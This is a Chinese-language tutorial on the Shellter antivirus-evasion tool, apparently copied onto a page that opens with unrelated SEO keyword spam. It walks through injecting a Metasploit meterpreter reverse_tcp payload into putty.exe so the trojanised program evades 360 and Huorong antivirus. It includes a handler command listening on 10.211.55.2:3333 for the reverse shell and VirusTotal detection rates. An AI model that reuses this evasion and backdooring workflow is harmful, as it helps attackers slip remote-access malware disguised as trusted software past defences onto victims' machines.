无锡在线制作网站,asp网站模板下载,销售系统软件,站长工具seo综合查询权重0x01 免杀能力一览表 几点说明#xff1a;
1、上表中标识 √ 说明相应杀毒软件未检测出病毒#xff0c;也就是代表了Bypass。
2、为了更好的对比效果#xff0c;大部分测试payload均使用msf的windows/meterperter/reverse_tcp模块生成。
3、由于本机测试时只是安装了360全…0x01 免杀能力一览表 几点说明
1、上表中标识 √ 说明相应杀毒软件未检测出病毒也就是代表了Bypass。
2、为了更好的对比效果大部分测试payload均使用msf的windows/meterperter/reverse_tcp模块生成。
3、由于本机测试时只是安装了360全家桶和火绒所以默认情况下360和火绒杀毒情况指的是静态动态查杀。360杀毒版本5.0.0.8160(2019.12.12)火绒版本5.0.33.13(2019.12.12)360安全卫士12.0.0.2001(2019.12.17)。
4、其他杀软的检测指标是在virustotal.com简称VT上在线查杀所以可能只是代表了静态查杀能力数据仅供参考不足以作为免杀的精确判断指标。
0x02 前言
Shellter和Venom、Veil是三大老牌免杀工具Shellter是一个开源的免杀工具利用动态Shellcode注入或者命令来实现免杀的效果。
0x03 安装shellter
1、kali中已经自带shellter可在图形界面中直接执行shellter命令即可
2、ubuntu系统中apt安装 apt-get update
apt-get install shellter3、手动下载windows版 官方下载站点 https://www.shellterproject.com/download/ 下载后解压无需安装cmd下可直接使用
0x04 生成payload
我就直接用kali自带的shellter进行演示需要提前准备一个pe文件作为被注入程序。我还是用之前选的putty.exe来进行测试。 之后程序会把putty.exe进行备份因为生成的payload会自动覆盖原来的putty.exe。 还是选择windows/meterpreter/reverse_tcp作为payload 上面有个选项Enable Stealth Mode是否启用隐身模式启用后免杀效果会变差建议不启用。
全程自动化生成最终的生成文件会替换原来的putty.exe。
通过对比可发现程序稍微变大了 在msf中使用handler -H 10.211.55.2 -P 3333 -p windows/meterpreter/reverse_tcp进行监听 在测试机中执行生成的putty.exe360和火绒均可免杀我试的时候火绒不可免杀可能我的火绒版本比较高 msf正常上线
0x05 小结
Shellter安装非常简单使用也非常便捷而且生成的payload免杀效果也都比较好windows和linux下都可以使用实在是居家旅行、**灭口必备良药。我是用的自动模式进行生产payload,你可以根据自己的需要进行手动配置这样生成的payload免杀效果会更好。
因为Shellter生成的shellcode是动态的所以被查杀的几率也有所不同测试过几次自动化生成的payload最好的秒杀效果是4/71最差的15/70整体来说也算不错了
0x06 参考
msf免杀及后渗透技术https://bbs.ichunqiu.com/thread-49618-1-1.html
